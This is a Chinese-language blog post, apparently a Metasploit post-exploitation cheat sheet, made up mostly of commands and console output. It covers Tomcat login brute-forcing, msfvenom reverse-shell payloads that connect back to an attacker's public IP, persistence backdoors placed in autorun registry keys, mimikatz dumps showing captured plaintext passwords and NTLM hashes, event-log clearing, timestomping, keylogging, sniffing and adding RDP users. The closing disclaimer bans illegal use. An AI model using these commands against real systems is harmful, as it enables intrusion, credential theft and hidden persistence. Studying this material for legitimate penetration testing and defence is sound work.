Metasploit渗透使用攻略

msf关于tomcat口令暴力猜解模块

use auxiliary/scanner/http/tomcat_mgr_login
show options
set rhosts 192.168.2.147
set RPORT 8080
run

  • 注意:tomcat默认每个账号登陆5次失败后,账户就会被锁定

msf建立windows反弹shell

1.生成windows反弹shell

msfconsle
msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe
//LHOST为公网IP
//LPORT为反弹端口
//4433.exe为生成文件

2.获取监听IP与端口

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 2xx.94.50.153
msf5 exploit(multi/handler) > set LPORT 4433
msf5 exploit(multi/handler) > run

3.反弹成功

meterpreter > sysinfo
Computer        : WIN-UKKED2CCSHJ
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows

meterpreter > getuid
Server username: IIS APPPOOL\padt002

msf建立linux反弹shell

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f elf > payload.elf
//LHOST为公网IP
//LPORT为反弹端口
//4433.exe为生成文件

msf建立persistence持久化

Meterpreter的persistence脚本允许注入Meterpreter代理,以确保系统重启之后Meterpreter还能运行。
如果是反弹连接方式,可以设置连接攻击机的时间间隔。如果是绑定方式,可以设置在指定时间绑定开放端口。
我们运行persistence脚本让系统开机自启动,启动命令为

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on which the system running Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter > run persistence -X -i 10 -p 6666 -r 192.168.71.105
//Meterpreter(-X),10秒(-i 10) 重连一次,使用端口为6666(-p 6666),连接的目的IP为 192.168.71.105
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WUST-3E75F1D708_20160106.3022/WUST-3E75F1D708_20160106.3022.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.71.105 LPORT=6666
[*] Persistent agent script is 148426 bytes long
[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SIjvSmRq.vbs
[*] Starting connection handler at port 6666 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SIjvSmRq.vbs
[+] Agent executed with PID 1308
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DNXmKhNlKXyA
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DNXmKhNlKXyA
meterpreter > 
[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 2 opened (192.168.71.105:6666 -> 192.168.71.112:1086) at 2016-01-06 20:30:26 +0800

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.71.112 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > sessions -i

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  2   meterpreter x86/win32  WUST-3E75F1D708\Administrator @ WUST-3E75F1D708  192.168.71.105:6666 -> 192.168.71.112:1086 (192.168.71.112)

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > 
自动化的脚本在C:\Documents and Settings\Administrator\Local Settings\Temp\下
自动化以后下次可以直接在msf下打开会话:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.71.105
lhost => 192.168.71.105
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > run

[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 3 opened (192.168.71.105:6666 -> 192.168.71.112:1098) at 2016-01-06 21:05:58 +0800

mimikatz抓取密码

mimikatz-获取密码1

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load mimikatz

Loading extension mimikatz...Success.
meterpreter > msv

[+] Running as SYSTEM

[*] Retrieving msv credentials

msv credentials

===============

 

AuthID    Package    Domain        User           Password

------    -------    ------        ----           --------

0;334101  NTLM       chenglee-PC   chenglee       lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }

0;334068  NTLM       chenglee-PC   chenglee       lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }

0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  n.s. (Credentials KO)

0;996     Negotiate  WORKGROUP     CHENGLEE-PC$   n.s. (Credentials KO)

0;49101   NTLM                                    n.s. (Credentials KO)

0;999     NTLM       WORKGROUP     CHENGLEE-PC$   n.s. (Credentials KO)
meterpreter > kerberos

[+] Running as SYSTEM

[*] Retrieving kerberos credentials

kerberos credentials

====================

 

AuthID    Package    Domain        User           Password

------    -------    ------        ----           --------

0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE 

0;996     Negotiate  WORKGROUP     CHENGLEE-PC$  

0;49101   NTLM                                   

0;999     NTLM       WORKGROUP     CHENGLEE-PC$  

0;334101  NTLM       chenglee-PC   chenglee       lizhenghua

0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

mimikatz-获取密码2

meterpreter > mimikatz_command -f samdump::hashes

Ordinateur : chenglee-PC

BootKey    : 0648ced51b6060bed1a3654e0ee0fd93

 

Rid  : 500

User : Administrator

LM   :

NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

 

Rid  : 501

User : Guest

LM   :

NTLM :

 

Rid  : 1000

User : chenglee

LM   :

NTLM : 8d0f8e1a18236379538411a9056799f5
meterpreter > mimikatz_command -f sekurlsa::searchPasswords

[0] { chenglee ; chenglee-PC ; lizhenghua }

[1] { chenglee ; chenglee-PC ; lizhenghua }

[2] { chenglee ; chenglee-PC ; lizhenghua }

[3] { chenglee ; chenglee-PC ; lizhenghua }

[4] { chenglee-PC ; chenglee ; lizhenghua }

[5] { chenglee-PC ; chenglee ; lizhenghua }

meterpreter >

meterpreter > mimikatz_command -f sekurlsa::searchPasswords

[0] { Administrator ; CLOUDVM ; 1244567 }

[1] { Administrator ; CLOUDVM ; 1244567 }

mimikatz-wdigest

meterpreter > wdigest

[+] Running as SYSTEM

[*] Retrieving wdigest credentials

wdigest credentials

===================

 

AuthID    Package    Domain        User           Password

------    -------    ------        ----           --------

0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE 

0;996     Negotiate  WORKGROUP     CHENGLEE-PC$  

0;49101   NTLM                                   

0;999     NTLM       WORKGROUP     CHENGLEE-PC$  

0;334101  NTLM       chenglee-PC   chenglee       lizhenghua

0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

mimikatz-tspkg

meterpreter > tspkg

[+] Running as SYSTEM

[*] Retrieving tspkg credentials

tspkg credentials

=================

 

AuthID    Package    Domain        User           Password

------    -------    ------        ----           --------

0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE 

0;996     Negotiate  WORKGROUP     CHENGLEE-PC$  

0;49101   NTLM                                   

0;999     NTLM       WORKGROUP     CHENGLEE-PC$  

0;334101  NTLM       chenglee-PC   chenglee       lizhenghua

0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

meterpreter基本命令

系统命令-基本系统命令

sessions
//sessions –h 查看帮助
sessions -l
//列出当前会话
sessions -i <ID值>
//进入会话
sessions -k
//杀死会话
background
//将当前会话放置后台
run
//执行已有的模块,输入run后按两下tab,列出已有的脚本
info
//查看已有模块信息
getuid
//查看权限 
getpid
//获取当前进程的pid
sysinfo
//查看目标机系统信息
ps
//查看当前活跃进程
kill <PID值>
//杀死进程
idletime
//查看目标机闲置时间
reboot
shutdown
//重启/关机
shell
//进入目标机cmd shell

系统命令-execute执行文件

execute
//在目标机中执行文件
execute -H -i -f cmd.exe
//创建新进程cmd.exe,-H不可见,-i交互

系统命令-clearev清除日志

clearev  #清除windows中的应用程序日志、系统日志、安全日志

文件系统命令-基本文件系统命令

getwd
pwd
//查看当前工作目录  
ls
//列出当前目录
cd
//跳转目录
search -f *pass*
//搜索文件  -h查看帮助
cat c:\\lltest\\lltestpasswd.txt
//查看文件内容
upload /tmp/hack.txt C:\\lltest
//上传文件到目标机上
download c:\\lltest\\lltestpasswd.txt /tmp/
//下载文件到本机上
edit c:\\1.txt
//编辑或创建文件,没有的话,会新建文件
rm C:\\lltest\\hack.txt
//删除文件
mkdir lltest2
//只能在当前目录下创建文件夹
rmdir lltest2
//只能删除当前目录下文件夹
getlwd
lpwd
//操作攻击者主机 查看当前目录
lcd /tmp
//操作攻击者主机 切换目录

文件系统命令-timestomp伪造时间戳

timestomp C:// -h   
//查看帮助
timestomp -v C://2.txt   
//查看时间戳
timestomp C://2.txt -f C://1.txt 
//将1.txt的时间戳复制给2.txt

网络命令-基本网络命令

ipconfig/ifconfig
netstat –ano
arp
getproxy 
//查看代理信息
route   
//查看路由

网络命令-portfwd端口转发

portfwd add -l 6666 -p 3389 -r 127.0.0.1
//将目标机的3389端口转发到本地6666端口

网络命令-端口扫描

run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389

提权

getsystem

getsystem工作原理:
①getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。
②getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。
③Windows服务已启动,导致与命名管道建立连接。
④该进程接收连接并调用ImpersonateNamedPipeClient,从而为SYSTEM用户创建模拟令牌。
然后用新收集的SYSTEM模拟令牌产生cmd.exe,并且我们有一个SYSTEM特权进程。

远程桌面&截屏

enumdesktops
//查看可用的桌面
getdesktop
//获取当前meterpreter 关联的桌面
set_desktop
//设置meterpreter关联的桌面  -h查看帮助
screenshot
//截屏
use espia
//或者使用espia模块截屏  然后输入screengrab
run vnc
//使用vnc远程桌面连接

远程桌面-getgui命令

run getgui –h
//查看帮助
run getgui -e
//开启远程桌面
run getgui -u lltest2 -p 123456
//添加用户
run getgui -f 6661 –e
//389端口转发到6661

getgui 系统不推荐,推荐使用run post/windows/manage/enable_rdp
getgui添加用户时,有时虽然可以成功添加用户,但是没有权限通过远程桌面登陆

远程桌面-enable_rdp脚本

run post/windows/manage/enable_rdp
//开启远程桌面
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456
//添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662
//将3389端口转发到6662

脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb
通过enable_rdp.rb脚本可知:开启rdp是通过reg修改注册表;添加用户是调用cmd.exe 通过net user添加;端口转发是利用的portfwd命令

键盘记录

keyscan_start
//开始键盘记录
keyscan_dump
//导出记录数据
keyscan_stop
//结束键盘记录

sniffer抓包

use sniffer
sniffer_interfaces
//查看网卡
sniffer_start 2
//选择网卡 开始抓包
sniffer_stats 2
//查看状态
sniffer_dump 2 /tmp/lltest.pcap
//导出pcap数据包
sniffer_stop 2
//停止抓包

哈希利用-获取哈希

run post/windows/gather/smart_hashdump
//从SAM导出密码哈希,需要SYSTEM权限

参考链接

csdn-利用Metasploit获取linux反弹shell的尝试
csdn-MSF生成windows木马
后渗透之meterpreter使用攻略
kali meterpreter中mimikatz模块获取密码

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合!

posted @ 2020-08-20 08:57  renblog  阅读(641)  评论(0编辑  收藏  举报